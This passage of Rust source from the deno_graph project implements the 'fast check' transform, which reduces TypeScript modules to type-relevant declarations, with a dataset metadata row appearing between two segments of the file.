Expr::Lit(lit) => match lit {
Lit::Num(_) | Lit::Str(_) => true,
Lit::Bool(_)
| Lit::Null(_)
| Lit::BigInt(_)
| Lit::Regex(_)
| Lit::JSXText(_) => false,
},
Expr::Tpl(tpl_expr) => {
for expr in tpl_expr.exprs {
if !self.valid_enum_init_expr(*expr) {
return false;
}
}
true
}
Expr::Paren(paren_expr) => self.valid_enum_init_expr(*paren_expr.expr),
Expr::TsTypeAssertion(ts_ass) => {
// Only assertions to number are allowed for computed
// enum members.
match *ts_ass.type_ann {
TsType::TsLitType(ts_lit) => match ts_lit.lit {
TsLit::Number(_) => true,
TsLit::Str(_)
| TsLit::Bool(_)
| TsLit::BigInt(_)
| TsLit::Tpl(_) => false,
},
TsType::TsKeywordType(_)
| TsType::TsThisType(_)
| TsType::TsFnOrConstructorType(_)
| TsType::TsTypeRef(_)
| TsType::TsTypeQuery(_)
| TsType::TsTypeLit(_)
| TsType::TsArrayType(_)
| TsType::TsTupleType(_)
| TsType::TsOptionalType(_)
| TsType::TsRestType(_)
| TsType::TsUnionOrIntersectionType(_)
| TsType::TsConditionalType(_)
| TsType::TsInferType(_)
| TsType::TsParenthesizedType(_)
| TsType::TsTypeOperator(_)
| TsType::TsIndexedAccessType(_)
| TsType::TsMappedType(_)
| TsType::TsTypePredicate(_)
| TsType::TsImportType(_) => false,
}
}
Expr::TsAs(ts_as) => self.valid_enum_ts_type(*ts_as.type_ann),
// These are not valid as enum member initializer and
// TS will throw a type error. For declaration generation
// they will be dropped in TS so we do that too.
Expr::TsInstantiation(_)
| Expr::Call(_)
| Expr::Update(_)
| Expr::PrivateName(_)
| Expr::TsSatisfies(_)
| Expr::TsNonNull(_)
| Expr::TsConstAssertion(_)
| Expr::Cond(_)
| Expr::Seq(_)
| Expr::TaggedTpl(_)
| Expr::Object(_)
| Expr::Array(_)
| Expr::Arrow(_)
| Expr::Class(_)
| Expr::Await(_)
| Expr::MetaProp(_)
| Expr::New(_)
| Expr::JSXMember(_)
| Expr::JSXNamespacedName(_)
| Expr::JSXEmpty(_)
| Expr::JSXElement(_)
| Expr::JSXFragment(_)
| Expr::Unary(_)
| Expr::Assign(_)
| Expr::Yield(_)
| Expr::SuperProp(_)
| Expr::Fn(_)
| Expr::This(_)
| Expr::Invalid(_) => false,
}
}
  /// Returns whether `ts_type` is acceptable as the target of an assertion
  /// in a computed enum member position: only numeric literal types are.
  ///
  /// The match is deliberately exhaustive (no wildcard arm) so adding a
  /// new `TsType` variant causes a compile error here and gets reviewed.
  fn valid_enum_ts_type(&mut self, ts_type: TsType) -> bool {
    match ts_type {
      TsType::TsLitType(ts_lit) => match ts_lit.lit {
        TsLit::Number(_) => true,
        TsLit::Str(_) | TsLit::Bool(_) | TsLit::BigInt(_) | TsLit::Tpl(_) => {
          false
        }
      },
      TsType::TsKeywordType(_)
      | TsType::TsThisType(_)
      | TsType::TsFnOrConstructorType(_)
      | TsType::TsTypeRef(_)
      | TsType::TsTypeQuery(_)
      | TsType::TsTypeLit(_)
      | TsType::TsArrayType(_)
      | TsType::TsTupleType(_)
      | TsType::TsOptionalType(_)
      | TsType::TsRestType(_)
      | TsType::TsUnionOrIntersectionType(_)
      | TsType::TsConditionalType(_)
      | TsType::TsInferType(_)
      | TsType::TsParenthesizedType(_)
      | TsType::TsTypeOperator(_)
      | TsType::TsIndexedAccessType(_)
      | TsType::TsMappedType(_)
      | TsType::TsTypePredicate(_)
      | TsType::TsImportType(_) => false,
    }
  }
fn infer_expr_fallback_any(
&mut self,
expr: Expr,
as_const: bool,
as_readonly: bool,
) -> Box<TsTypeAnn> {
match self.expr_to_ts_type(expr.clone(), as_const, as_readonly) {
Some(ts_type) => type_ann(ts_type),
_ => {
self.mark_diagnostic_any_fallback(expr.range());
any_type_ann()
}
}
}
  /// Converts a class body to its declaration-only form: drops overload
  /// implementations, strips method bodies and property initializers,
  /// and removes members that are irrelevant to the type.
  fn class_body_to_type(&mut self, body: Vec<ClassMember>) -> Vec<ClassMember> {
    body
      .into_iter()
      // first pass: drop overload implementation signatures so only the
      // overload declarations survive
      .filter(|member| match member {
        ClassMember::Constructor(constructor) => !self
          .public_ranges
          .is_impl_with_overloads(&constructor.range()),
        ClassMember::Method(method) => {
          !self.public_ranges.is_impl_with_overloads(&method.range())
        }
        ClassMember::TsIndexSignature(_)
        | ClassMember::ClassProp(_)
        | ClassMember::PrivateProp(_)
        | ClassMember::Empty(_)
        | ClassMember::StaticBlock(_)
        | ClassMember::AutoAccessor(_)
        | ClassMember::PrivateMethod(_) => true,
      })
      // second pass: strip bodies/values and normalize keys
      .filter_map(|member| match member {
        ClassMember::Constructor(mut class_constructor) => {
          class_constructor.body = None;
          self.handle_ts_param_props(&mut class_constructor.params);
          Some(ClassMember::Constructor(class_constructor))
        }
        ClassMember::Method(mut method) => {
          // unsupported computed names cause the member to be dropped
          match valid_prop_name(&method.key) {
            Some(new_prop_name) => {
              method.key = new_prop_name;
            }
            _ => {
              return None;
            }
          }
          method.function.body = None;
          // setters must not declare a return type
          if method.kind == MethodKind::Setter {
            method.function.return_type = None;
          }
          self.handle_func_params(&mut method.function.params);
          Some(ClassMember::Method(method))
        }
        ClassMember::ClassProp(mut prop) => {
          match valid_prop_name(&prop.key) {
            Some(new_prop_name) => {
              prop.key = new_prop_name;
            }
            _ => {
              return None;
            }
          }
          // no annotation: try to infer one from the initializer,
          // otherwise fall back to `any`
          if prop.type_ann.is_none()
            && let Some(value) = prop.value
          {
            prop.type_ann = self
              .expr_to_ts_type(*value, false, false)
              .map(type_ann)
              .or_else(|| Some(any_type_ann()));
          }
          prop.value = None;
          prop.definite = false;
          prop.declare = false;
          Some(ClassMember::ClassProp(prop))
        }
        ClassMember::TsIndexSignature(index_sig) => {
          Some(ClassMember::TsIndexSignature(index_sig))
        }
        // These can be removed as they are not relevant for types
        ClassMember::PrivateMethod(_)
        | ClassMember::PrivateProp(_)
        | ClassMember::Empty(_)
        | ClassMember::StaticBlock(_)
        | ClassMember::AutoAccessor(_) => None,
      })
      .collect()
  }
fn handle_ts_param_props(
&mut self,
param_props: &mut Vec<ParamOrTsParamProp>,
) {
for param in param_props {
match param {
ParamOrTsParamProp::TsParamProp(param) => {
match &mut param.param {
TsParamPropParam::Ident(ident) => {
self.handle_func_param_ident(ident);
}
TsParamPropParam::Assign(assign) => {
if let Some(new_pat) = self.handle_func_param_assign(assign) {
match new_pat {
Pat::Ident(new_ident) => {
param.param = TsParamPropParam::Ident(new_ident)
}
Pat::Assign(new_assign) => {
param.param = TsParamPropParam::Assign(new_assign)
}
Pat::Rest(_)
| Pat::Object(_)
| Pat::Array(_)
| Pat::Invalid(_)
| Pat::Expr(_) => {
// should never happen for parameter properties
unreachable!();
}
}
}
}
}
}
ParamOrTsParamProp::Param(param) => self.handle_func_param(param),
}
}
}
fn handle_func_params(&mut self, params: &mut Vec<Param>) {
for param in params {
self.handle_func_param(param);
}
}
fn handle_func_param(&mut self, param: &mut Param) {
match &mut param.pat {
Pat::Ident(ident) => {
self.handle_func_param_ident(ident);
}
Pat::Assign(assign_pat) => {
if let Some(new_pat) = self.handle_func_param_assign(assign_pat) {
param.pat = new_pat;
}
}
Pat::Array(_)
| Pat::Rest(_)
| Pat::Object(_)
| Pat::Invalid(_)
| Pat::Expr(_) => {}
}
}
fn handle_func_param_ident(&mut self, ident: &mut BindingIdent) {
if ident.type_ann.is_none() {
self.mark_diagnostic_any_fallback(ident.range());
ident.type_ann = Some(any_type_ann());
}
}
fn handle_func_param_assign(
&mut self,
assign_pat: &mut AssignPat,
) -> Option<Pat> {
match &mut *assign_pat.left {
Pat::Ident(ident) => {
if ident.type_ann.is_none() {
ident.type_ann = Some(self.infer_expr_fallback_any(
*assign_pat.right.clone(),
false,
false,
));
}
ident.optional = true;
Some(Pat::Ident(ident.clone()))
}
Pat::Array(arr_pat) => {
if arr_pat.type_ann.is_none() {
arr_pat.type_ann = Some(self.infer_expr_fallback_any(
*assign_pat.right.clone(),
false,
false,
));
}
arr_pat.optional = true;
Some(Pat::Array(arr_pat.clone()))
}
Pat::Object(obj_pat) => {
if obj_pat.type_ann.is_none() {
obj_pat.type_ann = Some(self.infer_expr_fallback_any(
*assign_pat.right.clone(),
false,
false,
));
}
obj_pat.optional = true;
Some(Pat::Object(obj_pat.clone()))
}
Pat::Rest(_) | Pat::Assign(_) | Pat::Expr(_) | Pat::Invalid(_) => None,
}
}
  /// Converts a binding pattern into a `TsFnParam` for a function type
  /// signature. Returns `None` (possibly after recording a diagnostic)
  /// when the pattern cannot be represented.
  fn pat_to_ts_fn_param(&mut self, pat: Pat) -> Option<TsFnParam> {
    match pat {
      Pat::Ident(binding_id) => Some(TsFnParam::Ident(binding_id)),
      Pat::Array(arr_pat) => Some(TsFnParam::Array(arr_pat)),
      Pat::Rest(rest_pat) => Some(TsFnParam::Rest(rest_pat)),
      Pat::Object(obj) => Some(TsFnParam::Object(obj)),
      // `x = default`: infer the type from the default value; keep the
      // identifier's name when there is one, otherwise synthesize one
      Pat::Assign(assign_pat) => self
        .expr_to_ts_type(*assign_pat.right, false, false)
        .map(|param| {
          let name = if let Pat::Ident(ident) = *assign_pat.left {
            ident.id.sym.clone()
          } else {
            self.gen_unique_name().into()
          };
          TsFnParam::Ident(BindingIdent {
            id: Ident::new(name, assign_pat.span, Default::default()),
            type_ann: Some(type_ann(param)),
          })
        }),
      Pat::Expr(expr) => {
        self.mark_diagnostic_unable_to_infer(expr.range());
        None
      }
      // Invalid code is invalid, not sure why SWC doesn't throw
      // a parse error here.
      Pat::Invalid(_) => None,
    }
  }
}
fn valid_prop_name(prop_name: &PropName) -> Option<PropName> {
fn prop_name_from_expr(expr: &Expr) -> Option<PropName> {
match expr {
Expr::Lit(e) => match &e {
Lit::Str(e) => Some(PropName::Str(e.clone())),
Lit::Num(e) => Some(PropName::Num(e.clone())),
Lit::BigInt(e) => Some(PropName::BigInt(e.clone())),
Lit::Bool(_) | Lit::Null(_) | Lit::Regex(_) | Lit::JSXText(_) => None,
},
Expr::Tpl(e) => {
if e.quasis.is_empty() && e.exprs.len() == 1 {
prop_name_from_expr(&e.exprs[0])
} else {
None
}
}
Expr::Paren(e) => prop_name_from_expr(&e.expr),
Expr::TsTypeAssertion(e) => prop_name_from_expr(&e.expr),
Expr::TsConstAssertion(e) => prop_name_from_expr(&e.expr),
Expr::TsNonNull(e) => prop_name_from_expr(&e.expr),
Expr::TsAs(e) => prop_name_from_expr(&e.expr),
Expr::TsSatisfies(e) => prop_name_from_expr(&e.expr),
Expr::Ident(_) => Some(PropName::Computed(ComputedPropName {
#[allow(clippy::disallowed_methods)]
span: deno_ast::swc::common::Spanned::span(&expr),
expr: Box::new(expr.clone()),
})),
Expr::TaggedTpl(_)
| Expr::This(_)
| Expr::Array(_)
| Expr::Object(_)
| Expr::Fn(_)
| Expr::Unary(_)
| Expr::Update(_)
| Expr::Bin(_)
| Expr::Assign(_)
| Expr::Member(_)
| Expr::SuperProp(_)
| Expr::Cond(_)
| Expr::Call(_)
| Expr::New(_)
| Expr::Seq(_)
| Expr::Arrow(_)
| Expr::Class(_)
| Expr::Yield(_)
| Expr::Await(_)
| Expr::MetaProp(_)
| Expr::JSXMember(_)
| Expr::JSXNamespacedName(_)
| Expr::JSXEmpty(_)
| Expr::JSXElement(_)
| Expr::JSXFragment(_)
| Expr::TsInstantiation(_)
| rust | MIT | 200a22dbd56b311d490ad00bed57fce34538598e | 2026-01-04T20:22:02.257944Z | true |
denoland/deno_graph | https://github.com/denoland/deno_graph/blob/200a22dbd56b311d490ad00bed57fce34538598e/src/fast_check/transform.rs | src/fast_check/transform.rs | // Copyright 2018-2024 the Deno authors. MIT license.
// for span methods, which actually make sense to use here in the transforms
#![allow(clippy::disallowed_methods)]
#![allow(clippy::disallowed_types)]
use std::collections::HashSet;
use std::sync::Arc;
use deno_ast::EmitOptions;
use deno_ast::ModuleSpecifier;
use deno_ast::MultiThreadedComments;
use deno_ast::ParsedSource;
use deno_ast::ProgramRef;
use deno_ast::SourceMap;
use deno_ast::SourceRange;
use deno_ast::SourceRangedForSpanned;
use deno_ast::emit;
use deno_ast::swc::ast::*;
use deno_ast::swc::common::DUMMY_SP;
use deno_ast::swc::common::Spanned;
use deno_ast::swc::common::SyntaxContext;
use deno_ast::swc::common::comments::CommentKind;
use deno_ast::swc::common::comments::SingleThreadedComments;
use deno_ast::swc::common::comments::SingleThreadedCommentsMapInner;
use deno_ast::swc::ecma_visit::VisitWith;
use indexmap::IndexMap;
use crate::ModuleGraph;
use crate::WorkspaceMember;
use crate::analysis::ModuleInfo;
use crate::ast::ParserModuleAnalyzer;
use crate::symbols::EsModuleInfo;
use crate::symbols::ExpandoPropertyRef;
use crate::symbols::Symbol;
use super::FastCheckDiagnostic;
use super::FastCheckDiagnosticRange;
use super::range_finder::ModulePublicRanges;
use super::swc_helpers::DeclMutabilityKind;
use super::swc_helpers::ReturnStatementAnalysis;
use super::swc_helpers::analyze_return_stmts_in_function_body;
use super::swc_helpers::any_type_ann;
use super::swc_helpers::is_void_type;
use super::swc_helpers::maybe_lit_to_ts_type;
use super::swc_helpers::new_ident;
use super::swc_helpers::ts_keyword_type;
use super::transform_dts::FastCheckDtsDiagnostic;
use super::transform_dts::FastCheckDtsTransformer;
/// Mutable, pruned view over a module's comments that supports removing
/// entries for dropped nodes before converting back for emit.
pub struct CommentsMut {
  // comments preceding a node, keyed by byte position
  leading: SingleThreadedCommentsMapInner,
  // comments following a node, keyed by byte position
  trailing: SingleThreadedCommentsMapInner,
}
impl CommentsMut {
  /// Takes ownership of the comment maps and prunes everything except
  /// JSDoc blocks (`/** ... */`) and `@ts-*` line directives.
  pub fn new(single_threaded: SingleThreadedComments) -> Self {
    let prune = |map: &mut SingleThreadedCommentsMapInner| {
      map.retain(|_pos, comment_list| {
        comment_list.retain(|comment| match comment.kind {
          // only keep js docs and @ts-* comments
          CommentKind::Line => comment.text.trim_start().starts_with("@ts-"),
          CommentKind::Block => comment.text.starts_with('*'),
        });
        !comment_list.is_empty()
      });
    };
    let (leading_cell, trailing_cell) = single_threaded.take_all();
    let mut leading = leading_cell.take();
    let mut trailing = trailing_cell.take();
    prune(&mut leading);
    prune(&mut trailing);
    Self { leading, trailing }
  }

  /// Drops the leading comments attached at `start` (used when the node
  /// they belong to is removed).
  pub fn remove_leading(&mut self, start: deno_ast::SourcePos) {
    self.leading.remove(&start.as_byte_pos());
  }

  /// Converts back into a thread-safe comment collection for emitting.
  pub fn into_multi_threaded(self) -> MultiThreadedComments {
    MultiThreadedComments::from_leading_and_trailing(
      self.leading,
      self.trailing,
    )
  }
}
/// The `.d.ts` output produced alongside a fast check transform.
#[derive(Debug, Clone)]
pub struct FastCheckDtsModule {
  // the transformed declaration-only program
  pub program: Program,
  pub comments: MultiThreadedComments,
  // diagnostics produced while generating the dts output
  pub diagnostics: Vec<FastCheckDtsDiagnostic>,
}
/// Result of fast-check transforming a single module.
#[derive(Debug)]
pub struct FastCheckModule {
  // module info re-computed from the transformed AST
  pub module_info: Arc<ModuleInfo>,
  // emitted source text of the transformed module
  pub text: Arc<str>,
  // separate source map for `text`
  pub source_map: Arc<str>,
  // present only when `TransformOptions::dts` was requested
  pub dts: Option<FastCheckDtsModule>,
}
/// Options controlling the fast check transform.
pub struct TransformOptions<'a> {
  pub workspace_members: &'a [WorkspaceMember],
  // when true, the transformer aborts on the first diagnostic instead of
  // collecting all of them
  pub should_error_on_first_diagnostic: bool,
  // whether to additionally produce a `.d.ts` module
  pub dts: bool,
}
/// Transforms a module into its fast check form and emits it, optionally
/// also producing a `.d.ts` module.
///
/// Returns the collected diagnostics as an `Err` when any were produced,
/// even if the transform itself succeeded.
pub fn transform(
  graph: &ModuleGraph,
  es_module_info: &EsModuleInfo,
  public_ranges: &ModulePublicRanges,
  options: &TransformOptions,
) -> Result<FastCheckModule, Vec<FastCheckDiagnostic>> {
  let mut transformer = FastCheckTransformer::new(
    graph,
    es_module_info,
    public_ranges,
    options.should_error_on_first_diagnostic,
  );
  let (module, comments) = transformer.transform()?;
  // diagnostics collected along the way invalidate the output
  if !transformer.diagnostics.is_empty() {
    return Err(transformer.diagnostics);
  }
  let parsed_source = es_module_info.source();
  let specifier = es_module_info.specifier();
  // recompute module info from the transformed AST
  let module_info = ParserModuleAnalyzer::module_info_from_swc(
    parsed_source.media_type(),
    ProgramRef::Module(&module),
    parsed_source.text_info_lazy(),
    &comments,
  );
  // swc will modify the comment collection internally when emitting,
  // so if we're emitting with dts, make a copy of the comments for
  // each emit
  let (fast_check_comments, dts_comments) = if options.dts {
    (comments.as_single_threaded(), Some(comments))
  } else {
    (comments.into_single_threaded(), None)
  };
  // now emit
  let source_map =
    SourceMap::single(specifier.clone(), parsed_source.text().to_string());
  let emitted_source = emit(
    ProgramRef::Module(&module),
    &fast_check_comments,
    &source_map,
    &EmitOptions {
      remove_comments: false,
      source_map: deno_ast::SourceMapOption::Separate,
      source_map_base: None,
      source_map_file: None,
      inline_sources: false,
    },
  )
  .map_err(|e| {
    vec![FastCheckDiagnostic::Emit {
      specifier: specifier.clone(),
      inner: Arc::new(e),
    }]
  })?;
  let emitted_text = emitted_source.text;
  // the dts transform consumes the module, so it runs after the emit above
  let dts = if let Some(dts_comments) = dts_comments {
    let mut dts_transformer = FastCheckDtsTransformer::new(
      parsed_source.text_info_lazy(),
      public_ranges,
      specifier,
    );
    let program = dts_transformer.transform(Program::Module(module));
    Some(FastCheckDtsModule {
      program,
      comments: dts_comments,
      diagnostics: dts_transformer.diagnostics,
    })
  } else {
    None
  };
  Ok(FastCheckModule {
    module_info: module_info.into(),
    text: emitted_text.into(),
    dts,
    source_map: emitted_source.source_map.unwrap().into(),
  })
}
/// Outcome of transforming a single module item.
enum TransformItemResult {
  /// Retain the item as is.
  Retain,
  /// Remove the item.
  Remove,
}

impl TransformItemResult {
  /// Maps `true` to [`Self::Retain`] and `false` to [`Self::Remove`].
  fn from_retain(retain: bool) -> Self {
    match retain {
      true => Self::Retain,
      false => Self::Remove,
    }
  }
}
/// Walks a module's AST and rewrites it into its fast check form,
/// collecting diagnostics along the way.
struct FastCheckTransformer<'a> {
  graph: &'a ModuleGraph,
  specifier: &'a ModuleSpecifier,
  es_module_info: &'a EsModuleInfo,
  public_ranges: &'a ModulePublicRanges,
  parsed_source: &'a ParsedSource,
  // presumably makes the first diagnostic abort the transform — confirm
  // against `mark_diagnostic`
  should_error_on_first_diagnostic: bool,
  diagnostics: Vec<FastCheckDiagnostic>,
  // expando-property var declarators collected for the current body,
  // keyed by the target identifier; flushed as synthesized namespaces in
  // `transform_module_body`
  expando_namespaces: IndexMap<Id, Vec<VarDeclarator>>,
}
impl<'a> FastCheckTransformer<'a> {
pub fn new(
graph: &'a ModuleGraph,
es_module_info: &'a EsModuleInfo,
public_ranges: &'a ModulePublicRanges,
should_error_on_first_diagnostic: bool,
) -> Self {
Self {
graph,
specifier: es_module_info.specifier(),
es_module_info,
public_ranges,
parsed_source: es_module_info.source(),
should_error_on_first_diagnostic,
diagnostics: Default::default(),
expando_namespaces: Default::default(),
}
}
  /// Entry point: transforms the parsed program into its fast check form,
  /// returning the rewritten SWC module plus the pruned comments.
  pub fn transform(
    &mut self,
  ) -> Result<
    (deno_ast::swc::ast::Module, MultiThreadedComments),
    Vec<FastCheckDiagnostic>,
  > {
    // declaration files (`.d.ts`) are ambient
    let is_ambient = self.parsed_source.media_type().is_declaration();
    let program = self.parsed_source.program_ref();
    let mut comments =
      CommentsMut::new(self.parsed_source.comments().as_single_threaded());
    // gracefully handle a script
    let mut module = match program {
      ProgramRef::Module(module) => module.clone(),
      // wrap script statements so the rest of the pipeline only deals
      // with modules
      ProgramRef::Script(script) => Module {
        span: script.span,
        body: script
          .body
          .iter()
          .map(|stmt| ModuleItem::Stmt(stmt.clone()))
          .collect(),
        shebang: script.shebang.clone(),
      },
    };
    module.body = self.transform_module_body(
      std::mem::take(&mut module.body),
      &mut comments,
      is_ambient,
    )?;
    Ok((module, comments.into_multi_threaded()))
  }
fn transform_module_body(
&mut self,
body: Vec<ModuleItem>,
comments: &mut CommentsMut,
is_ambient: bool,
) -> Result<Vec<ModuleItem>, Vec<FastCheckDiagnostic>> {
let parent_expando_namespaces =
std::mem::take(&mut self.expando_namespaces);
let mut final_body = Vec::with_capacity(body.len());
for mut item in body {
let result = self.transform_item(&mut item, comments, is_ambient)?;
match result {
TransformItemResult::Retain => final_body.push(item),
TransformItemResult::Remove => {
comments.remove_leading(item.start());
}
}
}
// Add accumulated namespaces
final_body.reserve(self.expando_namespaces.len());
for (swc_id, var_decls) in
std::mem::take(&mut self.expando_namespaces).drain(..)
{
let symbol = self.es_module_info.symbol_from_swc(&swc_id).unwrap();
for decl in &var_decls {
self.check_expando_property_diagnostics(decl, &swc_id, symbol)?;
}
// typescript requires the export keyword to match the other
// declarations so only add an export keyword if the other
// decls have one and also we don't want to export something
// that's not exported
let has_export_keyword = symbol.decls().iter().any(|d| {
d.maybe_node()
.map(|n| n.has_export_keyword())
.unwrap_or(false)
});
let module_decl = Decl::TsModule(Box::new(TsModuleDecl {
span: DUMMY_SP,
declare: false,
global: false,
namespace: true,
id: TsModuleName::Ident(Ident::new(
swc_id.0,
DUMMY_SP,
SyntaxContext::default(),
)),
body: Some(TsNamespaceBody::TsModuleBlock(TsModuleBlock {
span: DUMMY_SP,
body: vec![ModuleItem::ModuleDecl(ModuleDecl::ExportDecl(
ExportDecl {
span: DUMMY_SP,
decl: Decl::Var(Box::new(VarDecl {
span: DUMMY_SP,
ctxt: SyntaxContext::empty(),
kind: VarDeclKind::Var,
declare: false,
decls: var_decls,
})),
},
))],
})),
}));
final_body.push(if has_export_keyword {
ModuleItem::ModuleDecl(ModuleDecl::ExportDecl(ExportDecl {
span: DUMMY_SP,
decl: module_decl,
}))
} else {
ModuleItem::Stmt(Stmt::Decl(module_decl))
});
}
self.expando_namespaces = parent_expando_namespaces;
Ok(final_body)
}
  /// Emits a diagnostic for every identifier in an expando property
  /// initializer that resolves to an export of the same parent object
  /// (same name and same syntax context as the parent).
  fn check_expando_property_diagnostics(
    &mut self,
    decl: &VarDeclarator,
    parent_id: &Id,
    parent_symbol: &Symbol,
  ) -> Result<(), Vec<FastCheckDiagnostic>> {
    // visitor collecting offending identifiers; IndexMap keeps first-seen
    // insertion order while later occurrences overwrite the stored range
    struct VisitExpandoPropInits<'a> {
      symbol: &'a Symbol,
      parent_context: SyntaxContext,
      diagnostics: IndexMap<String, SourceRange>,
    }
    impl deno_ast::swc::ecma_visit::Visit for VisitExpandoPropInits<'_> {
      fn visit_ident(&mut self, ident: &Ident) {
        let (name, context) = ident.to_id();
        if context == self.parent_context && self.symbol.export(&name).is_some()
        {
          self.diagnostics.insert(name.to_string(), ident.range());
        }
      }
    }
    let mut inits = VisitExpandoPropInits {
      symbol: parent_symbol,
      parent_context: parent_id.1,
      diagnostics: Default::default(),
    };
    decl.init.visit_with(&mut inits);
    for (reference_name, range) in inits.diagnostics {
      self.mark_diagnostic(
        FastCheckDiagnostic::UnsupportedExpandoProperty {
          object_name: parent_id.0.to_string(),
          reference_name,
          range: self.source_range_to_range(range),
        },
      )?;
    }
    Ok(())
  }
fn transform_module_specifier(&mut self, src: &mut Str) {
// only do this for relative specifiers (specifiers to specifiers within the package)
let specifier = src.value.to_string_lossy();
if !specifier.starts_with('.') {
return;
}
let Some(resolved_specifier) =
self
.graph
.resolve_dependency(&specifier, self.specifier, true)
else {
return;
};
if let Some(relative) = self.specifier.make_relative(resolved_specifier) {
if !relative.starts_with("../") {
src.value = format!("./{}", relative).into();
} else {
src.value = relative.into();
}
src.raw = None;
}
}
  /// Transforms a single top-level module item, deciding whether it is
  /// retained (possibly rewritten in place) or removed from the output.
  fn transform_item(
    &mut self,
    item: &mut ModuleItem,
    comments: &mut CommentsMut,
    is_ambient: bool,
  ) -> Result<TransformItemResult, Vec<FastCheckDiagnostic>> {
    match item {
      ModuleItem::ModuleDecl(decl) => match decl {
        ModuleDecl::Import(n) => {
          // keep only the specifiers that are part of the public API
          n.specifiers
            .retain(|s| self.public_ranges.contains(&s.range()));
          let retain = !n.specifiers.is_empty();
          if retain {
            self.transform_module_specifier(&mut n.src);
          }
          Ok(TransformItemResult::from_retain(retain))
        }
        ModuleDecl::ExportNamed(n) => {
          n.specifiers
            .retain(|s| self.public_ranges.contains(&s.range()));
          let retain = !n.specifiers.is_empty();
          // re-exports (`export { x } from "..."`) carry a source
          if retain && let Some(src) = &mut n.src {
            self.transform_module_specifier(src);
          }
          Ok(TransformItemResult::from_retain(retain))
        }
        ModuleDecl::ExportAll(n) => {
          let retain = self.public_ranges.contains(&n.range());
          if retain {
            self.transform_module_specifier(&mut n.src);
          }
          Ok(TransformItemResult::from_retain(retain))
        }
        ModuleDecl::ExportDefaultExpr(n) => {
          // todo: investigate why both these checks are needed
          if !self.public_ranges.contains(&n.range())
            && !self.public_ranges.contains(&n.expr.range())
          {
            return Ok(TransformItemResult::Remove);
          }
          if self.maybe_transform_expr_if_leavable(&mut n.expr, None)?
            || is_expr_ident_or_member_idents(&n.expr)
          {
            Ok(TransformItemResult::Retain)
          } else {
            self.mark_diagnostic(
              FastCheckDiagnostic::UnsupportedDefaultExportExpr {
                range: self.source_range_to_range(n.range()),
              },
            )?;
            Ok(TransformItemResult::Remove)
          }
        }
        ModuleDecl::ExportDefaultDecl(n) => {
          if !self.public_ranges.contains(&n.range()) {
            return Ok(TransformItemResult::Remove);
          }
          let node_range = n.range();
          self.transform_default_decl(
            &mut n.decl,
            comments,
            node_range,
            is_ambient,
          )
        }
        ModuleDecl::ExportDecl(n) => {
          // pass the full `export ...` range for public-range lookups
          let export_decl_range = n.range();
          self.transform_decl(
            &mut n.decl,
            comments,
            Some(export_decl_range),
            is_ambient,
          )
        }
        ModuleDecl::TsImportEquals(n) => match &n.module_ref {
          TsModuleRef::TsEntityName(_) => {
            let retain = self.public_ranges.contains(&n.range());
            Ok(TransformItemResult::from_retain(retain))
          }
          // `import foo = require(...)` is not supported
          TsModuleRef::TsExternalModuleRef(_) => {
            self.mark_diagnostic(FastCheckDiagnostic::UnsupportedRequire {
              range: self.source_range_to_range(n.range()),
            })?;
            Ok(TransformItemResult::Remove)
          }
        },
        ModuleDecl::TsExportAssignment(n) => {
          self.mark_diagnostic(
            FastCheckDiagnostic::UnsupportedTsExportAssignment {
              range: self.source_range_to_range(n.range()),
            },
          )?;
          Ok(TransformItemResult::Remove)
        }
        ModuleDecl::TsNamespaceExport(n) => {
          self.mark_diagnostic(
            FastCheckDiagnostic::UnsupportedTsNamespaceExport {
              range: self.source_range_to_range(n.range()),
            },
          )?;
          Ok(TransformItemResult::Remove)
        }
      },
      ModuleItem::Stmt(stmt) => match stmt {
        Stmt::Decl(n) => self.transform_decl(n, comments, None, is_ambient),
        // only assignment expressions are inspected (see
        // `transform_assign_expr`); all other expressions are dropped
        Stmt::Expr(n) => match &mut *n.expr {
          Expr::Assign(assign_expr) => self.transform_assign_expr(assign_expr),
          _ => Ok(TransformItemResult::Remove),
        },
        // plain statements carry no type information
        Stmt::Block(_)
        | Stmt::Empty(_)
        | Stmt::Debugger(_)
        | Stmt::With(_)
        | Stmt::Return(_)
        | Stmt::Labeled(_)
        | Stmt::Break(_)
        | Stmt::Continue(_)
        | Stmt::If(_)
        | Stmt::Switch(_)
        | Stmt::Throw(_)
        | Stmt::Try(_)
        | Stmt::While(_)
        | Stmt::DoWhile(_)
        | Stmt::For(_)
        | Stmt::ForIn(_)
        | Stmt::ForOf(_) => Ok(TransformItemResult::Remove),
      },
    }
  }
fn transform_default_decl(
&mut self,
default_decl: &mut DefaultDecl,
comments: &mut CommentsMut,
parent_range: SourceRange,
is_ambient: bool,
) -> Result<TransformItemResult, Vec<FastCheckDiagnostic>> {
match default_decl {
DefaultDecl::Class(n) => {
(self.transform_class(
&mut n.class,
comments,
/* has declare keyword */ false,
)?);
Ok(TransformItemResult::Retain)
}
DefaultDecl::Fn(n) => {
self.transform_fn(
&mut n.function,
n.ident.as_ref().map(|i| i.range()),
FunctionKind::DeclarationLike,
self.public_ranges.is_impl_with_overloads(&parent_range),
is_ambient,
)?;
Ok(TransformItemResult::Retain)
}
DefaultDecl::TsInterfaceDecl(_) => Ok(TransformItemResult::Retain),
}
}
fn transform_decl(
&mut self,
decl: &mut Decl,
comments: &mut CommentsMut,
parent_range: Option<SourceRange>,
is_ambient: bool,
) -> Result<TransformItemResult, Vec<FastCheckDiagnostic>> {
let public_range = parent_range.unwrap_or_else(|| decl.range());
match decl {
Decl::Class(n) => {
if !self.public_ranges.contains(&public_range) {
return Ok(TransformItemResult::Remove);
}
self.transform_class(
&mut n.class,
comments,
is_ambient || n.declare,
)?;
Ok(TransformItemResult::Retain)
}
Decl::Fn(n) => {
if !self.public_ranges.contains(&public_range) {
return Ok(TransformItemResult::Remove);
}
let is_overload =
self.public_ranges.is_impl_with_overloads(&public_range);
self.transform_fn(
&mut n.function,
Some(n.ident.range()),
FunctionKind::DeclarationLike,
is_overload,
is_ambient,
)?;
Ok(TransformItemResult::Retain)
}
Decl::Var(n) => self.transform_var(n, is_ambient || n.declare),
Decl::TsInterface(_) => Ok(TransformItemResult::from_retain(
self.public_ranges.contains(&public_range),
)),
Decl::TsTypeAlias(_) => Ok(TransformItemResult::from_retain(
self.public_ranges.contains(&public_range),
)),
Decl::TsEnum(_) => Ok(TransformItemResult::from_retain(
self.public_ranges.contains(&public_range),
)),
Decl::TsModule(m) => self.transform_ts_module(
m,
&public_range,
comments,
is_ambient || m.declare || m.global,
),
Decl::Using(n) => {
if self.public_ranges.contains(&public_range)
|| n
.decls
.iter()
.any(|d| self.public_ranges.contains(&d.range()))
